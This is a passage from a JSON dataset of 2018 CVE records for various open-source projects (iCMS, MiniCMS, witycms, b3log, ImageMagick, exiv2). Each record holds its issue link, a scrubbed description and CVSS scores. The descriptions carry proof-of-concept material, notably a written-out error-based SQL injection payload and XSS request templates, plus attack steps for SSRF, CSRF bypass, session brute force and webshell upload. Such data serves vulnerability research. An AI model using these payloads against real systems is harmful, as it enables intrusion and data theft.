  24019. "description": "iCMS NUMBERTAG has an SSRF vulnerability. >An SSRF vulnerability was discovered in iCMS NUMBERTAG there is an SSRF vulnerability that allows remote attackers to construct malicious data to read sensitive server information via the APITAG Notice: this vulnerability is a bypass of an earlier fix, i.e. a flaw caused by an incomplete repair. Cause of the flaw: APITAG the following is the repair code of APITAG . In the code, the URL is checked against intranet IP ranges before the request is made. APITAG NUMBERTAG Bypass idea: through a custom domain name whose DNS A record resolves to an intranet IP APITAG, the program's URL check is bypassed, which indicates the check inspects the literal host in the URL rather than the address it resolves to; a robust fix must apply the intranet check to the resolved address and connect to that same checked address (a resolver answer can change between check and request). APITAG POC APITAG APITAG APITAG APITAG",
  24020. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  24021. "severity": "HIGH",
  24022. "baseScore": 7.5,
  24023. "impactScore": 3.6,
  24024. "exploitabilityScore": 3.9
  24025. },
  24026. {
  24027. "CVE_ID": "CVE-2018-15899",
  24028. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/21",
  24029. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/21",
  24030. "Repo_new": "bg5sbk/minicms",
  24031. "Issue_Created_At": "2018-08-24T07:36:08Z",
  24032. "description": "APITAG has a XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG Vulnerability trigger point: PATHTAG poc: URLTAG \"> APITAG APITAG APITAG APITAG",
  24033. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24034. "severity": "MEDIUM",
  24035. "baseScore": 6.1,
  24036. "impactScore": 2.7,
  24037. "exploitabilityScore": 2.8
  24038. },
  24039. {
  24040. "CVE_ID": "CVE-2018-15917",
  24041. "Issue_Url_old": "https://github.com/bbalet/jorani/issues/254",
  24042. "Issue_Url_new": "https://github.com/bbalet/jorani/issues/254",
  24043. "Repo_new": "bbalet/jorani",
  24044. "Issue_Created_At": "2018-08-02T20:28:32Z",
  24045. "description": "Multiple Vulnerabilities. Hi, The last version NUMBERTAG has multiple critical vulnerabilities, please contact me to solve it. Thank you!",
  24046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24047. "severity": "MEDIUM",
  24048. "baseScore": 5.4,
  24049. "impactScore": 2.7,
  24050. "exploitabilityScore": 2.3
  24051. },
  24052. {
  24053. "CVE_ID": "CVE-2018-16131",
  24054. "Issue_Url_old": "https://github.com/akka/akka-http/issues/2137",
  24055. "Issue_Url_new": "https://github.com/akka/akka-http/issues/2137",
  24056. "Repo_new": "akka/akka-http",
  24057. "Issue_Created_At": "2018-08-06T09:26:09Z",
  24058. "description": "APITAG does not respect APITAG When using FILETAG to handle APITAG any FILETAG applies to the compressed size, not the uncompressed size, so a small compressed request body can expand far beyond the configured limit after decoding. This might facilitate APITAG (decompression-bomb denial-of-service) attacks. The reason might be that APITAG uses APITAG which creates a new APITAG that is not limitable; the limit needs to be enforced on the decoded stream as well.",
  24059. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  24060. "severity": "HIGH",
  24061. "baseScore": 7.5,
  24062. "impactScore": 3.6,
  24063. "exploitabilityScore": 3.9
  24064. },
  24065. {
  24066. "CVE_ID": "CVE-2018-16157",
  24067. "Issue_Url_old": "https://github.com/caokang/waimai/issues/5",
  24068. "Issue_Url_new": "https://github.com/caokang/waimai/issues/5",
  24069. "Repo_new": "caokang/waimai",
  24070. "Issue_Created_At": "2018-08-29T21:50:18Z",
  24071. "description": "There is a business logic vulnerability that lets a client change the payment price. First we selected seven items; the price is NUMBERTAG FILETAG Then we captured the request. FILETAG We changed the value of the item_totals parameter to NUMBERTAG FILETAG So we can get the products for free, like this. FILETAG The server trusts the client-supplied item_totals; the total must be recomputed server-side from the item prices stored on the server, never taken from the request.",
  24072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  24073. "severity": "MEDIUM",
  24074. "baseScore": 5.3,
  24075. "impactScore": 1.4,
  24076. "exploitabilityScore": 3.9
  24077. },
  24078. {
  24079. "CVE_ID": "CVE-2018-16233",
  24080. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/22",
  24081. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/22",
  24082. "Repo_new": "bg5sbk/minicms",
  24083. "Issue_Created_At": "2018-08-30T08:06:13Z",
  24084. "description": "APITAG NUMBERTAG has XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG via tags parameter Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG POC: POST PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG APITAG rcc_accepted NUMBERTAG sidenav_treesearch=; APITAG APITAG APITAG icms[device_type]=desktop; APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  24085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24086. "severity": "MEDIUM",
  24087. "baseScore": 6.1,
  24088. "impactScore": 2.7,
  24089. "exploitabilityScore": 2.8
  24090. },
  24091. {
  24092. "CVE_ID": "CVE-2018-16234",
  24093. "Issue_Url_old": "https://github.com/urbanadventurer/WhatWeb/issues/261",
  24094. "Issue_Url_new": "https://github.com/urbanadventurer/whatweb/issues/261",
  24095. "Repo_new": "urbanadventurer/whatweb",
  24096. "Issue_Created_At": "2018-08-27T00:58:48Z",
  24097. "description": "Security Issue: Stored XSS. When APITAG is used to scan a target with the APITAG option, the target-controlled URL is written into the output unescaped, so stored XSS may occur in the report. The target looks like this: APITAG I used APITAG with APITAG NUMBERTAG APITAG And the result: ERRORTAG When I opened the result on Windows 7 with IE7, the XSS was triggered. APITAG Suggestion: encode the URL before writing it into the output (URL-encode it, or HTML-escape it if the output is HTML). APITAG will be converted to APITAG . Discovered by EMAILTAG",
  24098. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24099. "severity": "MEDIUM",
  24100. "baseScore": 6.1,
  24101. "impactScore": 2.7,
  24102. "exploitabilityScore": 2.8
  24103. },
  24104. {
  24105. "CVE_ID": "CVE-2018-16237",
  24106. "Issue_Url_old": "https://github.com/howchen/howchen/issues/2",
  24107. "Issue_Url_new": "https://github.com/howchen/howchen/issues/2",
  24108. "Repo_new": "howchen/howchen",
  24109. "Issue_Created_At": "2018-08-29T07:35:30Z",
  24110. "description": "Get APITAG admin permission by brute-forcing the session cookie. PART NUMBERTAG get the admin authentication. Here is a default APITAG admin user's cookie: CODETAG the APITAG is updated when the admin logs in, \" APITAG \" is the COOKIE_PREFIX by default, NUMBERTAG comes from the APITAG function in PHP, and the cookie is valid for NUMBERTAG hours\uff0c so because the cookie value is evidently derived from the login time, an attacker can obtain admin permission just by enumerating at most NUMBERTAG candidate values if the admin has logged in (a session token must come from a cryptographically secure random source, not from the clock). NUMBERTAG get a string by the APITAG function FILETAG APITAG NUMBERTAG craft a request CODETAG NUMBERTAG Send it to Intruder\uff0cconfigure the Positions and Payloads e.g. APITAG PART NUMBERTAG Remote Code Execution when logged in as admin (by part1\uff09, There is a Remote Code Execution vulnerability NUMBERTAG edit and update the file with the code APITAG PATHTAG ERRORTAG NUMBERTAG visit the url below URLTAG PART NUMBERTAG Directory Traversal when logged in as admin (by part1\uff09, There is a Directory Traversal vulnerability: read the content of PATHTAG CODETAG",
  24111. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  24112. "severity": "LOW",
  24113. "baseScore": 2.7,
  24114. "impactScore": 1.4,
  24115. "exploitabilityScore": 1.2
  24116. },
  24117. {
  24118. "CVE_ID": "CVE-2018-16248",
  24119. "Issue_Url_old": "https://github.com/b3log/solo/issues/12489",
  24120. "Issue_Url_new": "https://github.com/b3log/solo/issues/12489",
  24121. "Repo_new": "b3log/solo",
  24122. "Issue_Created_At": "2018-08-27T02:38:47Z",
  24123. "description": "A persistent XSS was found.. Hey, the wonderful work of personal blog! I find the security problems on the website: A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"tag\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC\uff1a PUT PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG APITAG APITAG APITAG Markdown\"}} This is a packet that contains \"payload\" submitted. Javascript gets executed. 
Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG FILETAG FILETAG Multiple locations are executing script code, including the front page of blog. If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
  24124. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24125. "severity": "MEDIUM",
  24126. "baseScore": 6.1,
  24127. "impactScore": 2.7,
  24128. "exploitabilityScore": 2.8
  24129. },
  24130. {
  24131. "CVE_ID": "CVE-2018-16249",
  24132. "Issue_Url_old": "https://github.com/b3log/symphony/issues/729",
  24133. "Issue_Url_new": "https://github.com/b3log/symphony/issues/729",
  24134. "Repo_new": "b3log/symphony",
  24135. "Issue_Created_At": "2018-08-27T07:43:59Z",
  24136. "description": "There is a persistent XSS in the title of the post office. Hey, I found the security problems on the website: A cross site scripting (XSS) vulnerability found in APITAG under APITAG in Symphony NUMBERTAG the ID APITAG of which is stored in the APITAG JSON field, executes \"payload\" when accessing this address (\" URLTAG \"), allowing remote attacks Any Web script or HTML can be inserted into the APITAG authen through a well written web site name. Verified HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC: PUT /article NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG APITAG APITAG X Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG b3log APITAG Connection: close APITAG APITAG APITAG APITAG This is a packet that contains \"payload\" submitted. FILETAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. APITAG is executed. The following is the output of the payload mentioned in the input and save. The.Ip address is URLTAG FILETAG",
  24137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24138. "severity": "MEDIUM",
  24139. "baseScore": 4.8,
  24140. "impactScore": 2.7,
  24141. "exploitabilityScore": 1.7
  24142. },
  24143. {
  24144. "CVE_ID": "CVE-2018-16250",
  24145. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/156",
  24146. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/156",
  24147. "Repo_new": "creatiwity/witycms",
  24148. "Issue_Created_At": "2018-08-29T08:41:37Z",
  24149. "description": "Persistent XSS. The \"utilisateur\" (user) menu on the APITAG NUMBERTAG site has stored XSS at two input points of the user information form, the \"first name\" and \"last name\" parameters. payload: \" APITAG \" APITAG JavaScript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG Payload data are submitted to PATHTAG FILETAG When a user later opens the name-change form, clicking the input box triggers the stored code. FILETAG FILETAG FILETAG",
  24150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24151. "severity": "MEDIUM",
  24152. "baseScore": 5.4,
  24153. "impactScore": 2.7,
  24154. "exploitabilityScore": 2.3
  24155. },
  24156. {
  24157. "CVE_ID": "CVE-2018-16251",
  24158. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/157",
  24159. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/157",
  24160. "Repo_new": "creatiwity/witycms",
  24161. "Issue_Created_At": "2018-08-29T09:47:35Z",
  24162. "description": "Found a SQL injection. The user search under the witycms NUMBERTAG APITAG menu is injectable: the input parameters are not filtered (nor bound as query parameters) before reaching the query. PATHTAG APITAG payload: firstname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG lastname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG Vulnerable pages and addresses: FILETAG URLTAG Attacked through sqlmap to find the database name and database type (the payloads above appear to be error-based, using the duplicate-key GROUP BY trick). FILETAG FILETAG The page executed by the backend code: FILETAG PATHTAG",
  24163. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  24164. "severity": "MEDIUM",
  24165. "baseScore": 4.3,
  24166. "impactScore": 1.4,
  24167. "exploitabilityScore": 2.8
  24168. },
  24169. {
  24170. "CVE_ID": "CVE-2018-16278",
  24171. "Issue_Url_old": "https://github.com/howchen/howchen/issues/3",
  24172. "Issue_Url_new": "https://github.com/howchen/howchen/issues/3",
  24173. "Repo_new": "howchen/howchen",
  24174. "Issue_Created_At": "2018-08-31T08:29:53Z",
  24175. "description": "APITAG sql injection via dir parameter. FILETAG CODETAG execute the commands below: APITAG",
  24176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24177. "severity": "CRITICAL",
  24178. "baseScore": 9.8,
  24179. "impactScore": 5.9,
  24180. "exploitabilityScore": 3.9
  24181. },
  24182. {
  24183. "CVE_ID": "CVE-2018-16283",
  24184. "Issue_Url_old": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
  24185. "Issue_Url_new": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
  24186. "Repo_new": "springjk/wordpress-wechat-broadcast",
  24187. "Issue_Created_At": "2018-08-31T16:51:55Z",
  24188. "description": "Vulnerability: Local File Inclusion. This bug was found in the file: PATHTAG echo APITAG ? $_GET[\"url\"] : ''); The \"url\" parameter is not sanitized, allowing local or remote files to be included. (Note that the snippet shown only echoes the raw parameter value; the inclusion sink itself is not visible in this excerpt.)",
  24189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24190. "severity": "CRITICAL",
  24191. "baseScore": 9.8,
  24192. "impactScore": 5.9,
  24193. "exploitabilityScore": 3.9
  24194. },
  24195. {
  24196. "CVE_ID": "CVE-2018-16298",
  24197. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/23",
  24198. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/23",
  24199. "Repo_new": "bg5sbk/minicms",
  24200. "Issue_Created_At": "2018-08-31T06:54:34Z",
  24201. "description": "APITAG NUMBERTAG has Another XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG while state=delete, draft, publish via tag parameter. Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG GET PATHTAG NUMBERTAG GET PATHTAG",
  24202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24203. "severity": "MEDIUM",
  24204. "baseScore": 6.1,
  24205. "impactScore": 2.7,
  24206. "exploitabilityScore": 2.8
  24207. },
  24208. {
  24209. "CVE_ID": "CVE-2018-16299",
  24210. "Issue_Url_old": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
  24211. "Issue_Url_new": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
  24212. "Repo_new": "julianburr/wp-plugin-localizemypost",
  24213. "Issue_Created_At": "2018-08-31T22:48:13Z",
  24214. "description": "Localize My Post Wordpress Vulnerability. Hello, There are a vulnerability on this plugin, I send you an email from EMAILTAG",
  24215. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  24216. "severity": "HIGH",
  24217. "baseScore": 7.5,
  24218. "impactScore": 3.6,
  24219. "exploitabilityScore": 3.9
  24220. },
  24221. {
  24222. "CVE_ID": "CVE-2018-16314",
  24223. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/35",
  24224. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/35",
  24225. "Repo_new": "idreamsoft/iCMS",
  24226. "Issue_Created_At": "2018-08-10T07:32:12Z",
  24227. "description": "Admincp.php has a CSRF. When verifying CSRF_TOKEN, if CSRF_TOKEN is absent from the request, only the Referer header is validated, and that check can be bypassed by path masking (placing the expected string in the path of an attacker-controlled URL). The fix is to reject the request whenever the token is missing rather than falling back to a Referer check. PAYLOAD APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Put the HTML file under the camouflaged Referer path PATHTAG and submit the request; the Referer header is\uff1a Referer: FILETAG This bypasses the Referer validation. FILETAG",
  24228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24229. "severity": "HIGH",
  24230. "baseScore": 8.8,
  24231. "impactScore": 5.9,
  24232. "exploitabilityScore": 2.8
  24233. },
  24234. {
  24235. "CVE_ID": "CVE-2018-16315",
  24236. "Issue_Url_old": "https://github.com/caokang/waimai/issues/3",
  24237. "Issue_Url_new": "https://github.com/caokang/waimai/issues/3",
  24238. "Repo_new": "caokang/waimai",
  24239. "Issue_Created_At": "2018-08-02T02:40:12Z",
  24240. "description": "There is a CSRF vulnerability that can change the information of shop. After the administrator logged in, open the following the page poc\uff1a FILETAG //change the information of shop APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  24241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24242. "severity": "MEDIUM",
  24243. "baseScore": 6.5,
  24244. "impactScore": 3.6,
  24245. "exploitabilityScore": 2.8
  24246. },
  24247. {
  24248. "CVE_ID": "CVE-2018-16320",
  24249. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/41",
  24250. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/41",
  24251. "Repo_new": "idreamsoft/iCMS",
  24252. "Issue_Created_At": "2018-08-27T03:43:37Z",
  24253. "description": "Get shell by upload and install plugin.. Exploit Step APITAG the upload directory. APITAG the zip file which contain the exploit APITAG can download from the plugin store. APITAG the zip APITAG the install button and modify the request package as show below. APITAG the page which create by the evil zip file. FILETAG FILETAG FILETAG FILETAG FILETAG Suggetion : Never allow user to modify the path with \u2018../\u2018. I am requesting a cve id.I need your APITAG for your reading.",
  24254. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  24255. "severity": "HIGH",
  24256. "baseScore": 7.2,
  24257. "impactScore": 5.9,
  24258. "exploitabilityScore": 1.2
  24259. },
  24260. {
  24261. "CVE_ID": "CVE-2018-16325",
  24262. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1284",
  24263. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1284",
  24264. "Repo_new": "getsimplecms/getsimplecms",
  24265. "Issue_Created_At": "2018-07-12T04:03:56Z",
  24266. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG create new page url: FILETAG title input payload APITAG FILETAG NUMBERTAG clike the link FILETAG NUMBERTAG ss cookie FILETAG FILETAG Release Info NUMBERTAG author by xijun. EMAILTAG .cn",
  24267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24268. "severity": "MEDIUM",
  24269. "baseScore": 6.1,
  24270. "impactScore": 2.7,
  24271. "exploitabilityScore": 2.8
  24272. },
  24273. {
  24274. "CVE_ID": "CVE-2018-16327",
  24275. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/771",
  24276. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/771",
  24277. "Repo_new": "intelliants/subrion",
  24278. "Issue_Created_At": "2018-07-31T03:47:39Z",
  24279. "description": "Validate admin panel URL config. Please add some rules for this config field as currently it can even store XSS payloads like ERRORTAG",
  24280. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24281. "severity": "MEDIUM",
  24282. "baseScore": 4.8,
  24283. "impactScore": 2.7,
  24284. "exploitabilityScore": 1.7
  24285. },
  24286. {
  24287. "CVE_ID": "CVE-2018-16328",
  24288. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1224",
  24289. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1224",
  24290. "Repo_new": "imagemagick/imagemagick",
  24291. "Issue_Created_At": "2018-07-23T14:19:53Z",
  24292. "description": "A null pointer dereferene in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG we can see a function APITAG APITAG , then the code use p >event_mask in the line NUMBERTAG but don't check the point p. In the function APITAG it will return NULL point if APITAG . In PATHTAG we can see the code check the value of option, but in PATHTAG we don't have this check.",
  24293. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24294. "severity": "CRITICAL",
  24295. "baseScore": 9.8,
  24296. "impactScore": 5.9,
  24297. "exploitabilityScore": 3.9
  24298. },
  24299. {
  24300. "CVE_ID": "CVE-2018-16329",
  24301. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1225",
  24302. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1225",
  24303. "Repo_new": "imagemagick/imagemagick",
  24304. "Issue_Created_At": "2018-07-23T14:38:58Z",
  24305. "description": "A null pointer dereferene might happend in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG the code has a assert to see whether image is null APITAG , but the condition still to be true if image_info is not null. And then in line NUMBERTAG comparing \"image\" to null implies that \"image\" might be null. The code don't do anything and it might to be a null pointer dereferene in switch case code like APITAG",
  24306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24307. "severity": "CRITICAL",
  24308. "baseScore": 9.8,
  24309. "impactScore": 5.9,
  24310. "exploitabilityScore": 3.9
  24311. },
  24312. {
  24313. "CVE_ID": "CVE-2018-16330",
  24314. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/612",
  24315. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/612",
  24316. "Repo_new": "pandao/editor.md",
  24317. "Issue_Created_At": "2018-08-16T06:45:07Z",
  24318. "description": "This editor is not fully filtered, causing XSS vulnerabilities. when We enter some strings,such as: APITAG APITAG '\"> The editor will execute XSS payload APITAG When some cms use this editor, it is easy to get administrator rights by using XSS attack.",
  24319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24320. "severity": "MEDIUM",
  24321. "baseScore": 6.1,
  24322. "impactScore": 2.7,
  24323. "exploitabilityScore": 2.8
  24324. },
  24325. {
  24326. "CVE_ID": "CVE-2018-16332",
  24327. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/31",
  24328. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/31",
  24329. "Repo_new": "idreamsoft/iCMS",
  24330. "Issue_Created_At": "2018-07-26T09:32:42Z",
  24331. "description": "There is a CSRF vulnerability that admin can pass any person's article in iCMS NUMBERTAG Firstly any user write an article and publish,then find the article ID in MY ARTICLE menu. When admin click this URL,article will be passed. URL : URLTAG We can hide this URL poc : FILETAG APITAG id NUMBERTAG is the article ID.",
  24332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24333. "severity": "HIGH",
  24334. "baseScore": 8.8,
  24335. "impactScore": 5.9,
  24336. "exploitabilityScore": 2.8
  24337. },
  24338. {
  24339. "CVE_ID": "CVE-2018-16336",
  24340. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/400",
  24341. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/400",
  24342. "Repo_new": "exiv2/exiv2",
  24343. "Issue_Created_At": "2018-08-14T02:17:50Z",
  24344. "description": "APITAG NUMBERTAG heap buffer overflow problems ( APITAG && bool APITAG APITAG char >(unsigned char )). Following bugs was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG ) both tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master ce NUMBERTAG ed NUMBERTAG exi NUMBERTAG POC POC1 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG fa NUMBERTAG bp NUMBERTAG fff NUMBERTAG f NUMBERTAG d0 sp NUMBERTAG fff NUMBERTAG f NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8dc1 in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8b3a in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG const&, int, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG 